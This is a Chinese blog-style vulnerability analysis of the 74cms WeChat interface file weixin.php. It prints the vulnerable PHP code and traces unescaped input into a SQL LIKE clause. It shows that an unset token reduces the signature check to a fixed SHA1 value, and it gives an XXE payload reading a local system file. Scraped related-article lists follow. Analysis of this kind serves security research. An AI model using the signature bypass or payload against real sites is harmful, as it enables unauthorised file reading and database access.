很早以前的一个洞,看到很有意思就拿来看看

这是雨曾经审过的一个洞,因为读取方式很特别复现了一下

upload\plus\weixin.php

public function responseMsg()

    {

		if(!$this->checkSignature())

		{

        	exit();

        }

		$postStr = $GLOBALS["HTTP_RAW_POST_DATA"];

		if (!empty($postStr))

		{

              	$postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);

                $fromUsername = $postObj->FromUserName;

                $toUsername = $postObj->ToUserName;

                $keyword = trim($postObj->Content);

				$keyword = iconv("utf-8","gb2312",$keyword);

                $time = time();

				$event = trim($postObj->Event);

				if ($event === "subscribe")

				{

					$word= "�ظ�j���ؽ����Ƹ���ظ�n����������Ƹ�������Գ�������ְλ�����硰��ơ���ϵͳ���᷵����Ҫ�ҵ���Ϣ������Ŭ�����������Ի��ķ���ƽ̨��лл��ע��";

					$text="<xml>

					<ToUserName><![CDATA[".$fromUsername."]]></ToUserName>

					<FromUserName><![CDATA[".$toUsername."]]></FromUserName>

					<CreateTime>".$time."</CreateTime>

					<MsgType><![CDATA[text]]></MsgType>

					<Content><![CDATA[".$word."]]></Content>

					</xml> ";

					exit($text);

				}

               	if (!empty($keyword))

				{

					if($_CFG['sina_apiopen']=='0')

					{

							$word="��վ΢�Žӿ��Ѿ��ر�";

							$text="<xml>

							<ToUserName><![CDATA[".$fromUsername."]]></ToUserName>

							<FromUserName><![CDATA[".$toUsername."]]></FromUserName>

							<CreateTime>".$time."</CreateTime>

							<MsgType><![CDATA[text]]></MsgType>

							<Content><![CDATA[".$word."]]></Content>

							</xml> ";

							exit($text);

					}

										$limit=" LIMIT 6";

										$orderbysql=" ORDER BY refreshtime DESC";

										if($keyword=="n")

										{

											$jobstable=table('jobs_search_rtime');

										}

										else if($keyword=="j")

										{

											$jobstable=table('jobs_search_rtime');

											$wheresql=" where `emergency`=1 ";

										}

										else

										{

										$jobstable=table('jobs_search_key');

										$wheresql.=" where likekey LIKE '%{$keyword}%' ";

										}

										$word='';

										$list = $id = array();

										$idresult = $this->query("SELECT id FROM {$jobstable} ".$wheresql.$orderbysql.$limit);

										while($row = $this->fetch_array($idresult))

										{

										$id[]=$row['id'];

										}

										if (!empty($id))

										{

										$wheresql=" WHERE id IN (".implode(',',$id).") ";

										$result = $this->query("SELECT * FROM ".table('jobs').$wheresql.$orderbysql);

											while($row = $this->fetch_array($result))

											{

											//$row['jobs_url']=url_rewrite('QS_jobsshow',array('id'=>$row['id']));

											$row['addtime']=date("Y-m-d",$row['addtime']);

											$row['deadline']=date("Y-m-d",$row['deadline']);

											$row['refreshtime']=date("Y-m-d",$row['refreshtime']);

											$word.="{$row['companyname']}\n��Ƹְλ��{$row['jobs_name']}\nн�������{$row['wage_cn']}\n��Ƹ������{$row['amount']}\n�������ڣ�{$row['addtime']}\n��ֹ���ڣ�{$row['deadline']} \n--------------------------\n";

											}

										}

										if(empty($word))

										{

											$word="û���ҵ������ؼ��� {$keyword} ����Ϣ�����������ؼ���";

											$text="<xml>

											<ToUserName><![CDATA[".$fromUsername."]]></ToUserName>

											<FromUserName><![CDATA[".$toUsername."]]></FromUserName>

											<CreateTime>".$time."</CreateTime>

											<MsgType><![CDATA[text]]></MsgType>

											<Content><![CDATA[".$word."]]></Content>

											</xml> ";

											exit($text);

										}

										else

										{

												$word=rtrim($word,'/\n');

												$word=rtrim($word,'-');

												$text="<xml>

												<ToUserName><![CDATA[".$fromUsername."]]></ToUserName>

												<FromUserName><![CDATA[".$toUsername."]]></FromUserName>

												<CreateTime>".$time."</CreateTime>

												<MsgType><![CDATA[text]]></MsgType>

												<Content><![CDATA[".$word."]]></Content>

												</xml> ";

												exit($text);

										}

				}

				else

				{

				exit("");

				}

    	}

	}

首先看到一个sql语句
$idresult = $this->query("SELECT id FROM {$jobstable} ".$wheresql.$orderbysql.$limit);
倒回去跟进几个变量

$orderbysql=" ORDER BY refreshtime DESC"
$limit=" LIMIT 6";
且当$keyword!=n/j时
$wheresql.=" where likekey LIKE '%{$keyword}%' ";

接着看$keyword
$keyword = trim($postObj->Content);
$postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);
$postStr = $GLOBALS["HTTP_RAW_POST_DATA"];

重点来了$postStr = $GLOBALS["HTTP_RAW_POST_DATA"];
$GLOBALS["HTTP_RAW_POST_DATA"]这个东西其实基本上等于$_POST
唯一一点区别就是前者能接受不是php能识别的东西。

$postStr就是直接post过来的数据,没有经过任何处理,而且$GLOBALS["HTTP_RAW_POST_DATA"]这样传入进来的数据
可以无视gpc。
$postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);当然这里的$postStr应该是传入
xml然后经过simpxml_load_string解析。然后把xml解析过后的直接传入Content这就可以导致任意文件读出。

接着再看看条件

if(!$this->checkSignature())

		{

        	exit();

        }

跟进这个函数看看
在131到150行

private function checkSignature()

	{

        $signature = $_GET["signature"];

        $timestamp = $_GET["timestamp"];

        $nonce = $_GET["nonce"];

		$token = TOKEN;

		$tmpArr = array($token, $timestamp, $nonce);

		sort($tmpArr);

		$tmpStr = implode( $tmpArr );

		$tmpStr = sha1( $tmpStr );

		if($tmpStr == $signature )

		{

			return true;

		}

		else

		{

			return false;

		}

	}

}

所以在默认条件下,没有wx_token时,这个$tmpStr == $signature==da39a3ee5e6b4b0d3255bfef95601890afd80709,这是一个固定的值了,我们是完全可以利用上面的漏洞读入任意文件。

构造pyload

<?xml version="1.0" encoding="utf-8"?>

    <! DOCTYPE ANY [

    <!ENTITY % test SYSTEM "file:///c:/windows/win.ini">

    ]>

post传入这个可以读取

74cms漏洞分析的更多相关文章

  1. Zabbix 漏洞分析

    之前看到Zabbix 出现SQL注入漏洞,自己来尝试分析. PS:我没找到3.0.3版本的 Zabbix ,暂用的是zabbix 2.2.0版本,如果有问题,请大牛指点. 0x00 Zabbix简介 ...

  2. PHPCMS \phpcms\modules\member\index.php 用户登陆SQL注入漏洞分析

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述2. 漏洞触发条件 0x1: POC http://localhost/p ...

  3. CVE-2016-0143 漏洞分析(2016.4)

    CVE-2016-0143漏洞分析 0x00 背景 4月20日,Nils Sommer在exploitdb上爆出了一枚新的Windows内核漏洞PoC.该漏洞影响所有版本的Windows操作系统,攻击 ...

  4. Java反序列化漏洞分析

    相关学习资料 http://www.freebuf.com/vuls/90840.html https://security.tencent.com/index.php/blog/msg/97 htt ...

  5. CVE-2014-1767 漏洞分析(2015.1)

    CVE-2014-1767 漏洞分析 1. 简介 该漏洞是由于Windows的afd.sys驱动在对系统内存的管理操作中,存在着悬垂指针的问题.在特定情况下攻击者可以通过该悬垂指针造成内存的doubl ...

  6. CVE-2014-4115漏洞分析(2014.11)

    CVE-2014-4115漏洞分析 一.简介 该漏洞是由于Windows的Fastfat.sys组件在处理FAT32格式的硬盘分区存在问题.攻击者利用成功可导致权限提升. 影响的系统包括: Windo ...

  7. FFmpeg任意文件读取漏洞分析

    这次的漏洞实际上与之前曝出的一个 CVE 非常之类似,可以说是旧瓶装新酒,老树开新花. 之前漏洞的一篇分析文章: SSRF 和本地文件泄露(CVE-2016-1897/8)http://static. ...

  8. CVE-2016-10190 FFmpeg Http协议 heap buffer overflow漏洞分析及利用

    作者:栈长@蚂蚁金服巴斯光年安全实验室 -------- 1. 背景 FFmpeg是一个著名的处理音视频的开源项目,非常多的播放器.转码器以及视频网站都用到了FFmpeg作为内核或者是处理流媒体的工具 ...

  9. Oracle漏洞分析(tns_auth_sesskey)

    p216 Oracle漏洞分析: 开启oracle: C:\oracle\product\\db_1\BIN\sqlplus.exe /nolog conn sys/mima1234 as sysdb ...

随机推荐

  1. Mysql中文检索匹配与正则

    今天在用sql模糊查询包含字母d的时候,发现一些不包含此字母的也被查询出来了: SELECT * FROM custom WHERE custom_realname LIKE '%d%' 查询了一下, ...

  2. 检测UTF-8编码

    在PHP检测字符串是否是UTF-8编码的时候,很多人在使用mb_detect_encoding的时候,经常遇到检测不准的问题,下面的方法可以准确检测编码是否是UTF-8 function check_ ...

  3. 【thrift】vc中使用thrift中文字符串乱码问题解决

    问题描述: VC中使用Apache thrift时,如果字符串中包含中文,会出现乱码问题,这个问题的原因是由于thrift为了达到跨语言交互而使用了UTF-8格式发送字符串,这点对java或者C#不会 ...

  4. JVM(一)虚拟机内存划分

    Java内存区域 线程私有数据区域:虚拟机栈,本地方法栈,程序计数器 线程共享数据区域:方法区,堆 程序计数器:当前线程所执行的字节码的行号指示器,JVM通过这个字节码解释器改变计数器的值,以选择下一 ...

  5. javaCV入门指南:调用FFmpeg原生API和JavaCV是如何封装了FFmpeg的音视频操作?

    通过"javaCV入门指南:序章 "大家知道了处理音视频流媒体的前置基本知识,基本知识包含了像素格式.编解码格式.封装格式.网络协议以及一些音视频专业名词,专业名词不会赘述,自行搜 ...

  6. QT(2)项目文件介绍

    一.项目创建 二.文件说明 三.QT模块

  7. bzoj 3680(洛谷1337) 吊打XXX——模拟退火

    题目:https://www.lydsy.com/JudgeOnline/problem.php?id=3680 https://www.luogu.org/problemnew/show/P1337 ...

  8. WPF 使用MultiBinding ,TwoWay ,ValidationRule ,需要注意的事项

    当wpf使用multibinding时, 其内部的validaterule的value 是其多个Binding的值, 要根据情况去验证, 还有就是在做IMultiConverter的ConvertBa ...

  9. Hadoop安装全教程 Ubuntu14.04+Java1.8.0+Hadoop2.7.6

    最近听了一个关于大数据的大牛的经验分享,在分享的最后大牛给我们一个他之前写好的关于大数据和地理应用demo.这个demo需要在Linux环境上搭建Hadoop平台.这次就简单的分享一下我关于在 Lin ...

  10. Jasper:目录/资源

    ylbtech-Jasper:目录/资源 1. 官网返回顶部 1. https://www.jasper.com/ 2. 2.返回顶部 1. http://api.jasperwireless.com ...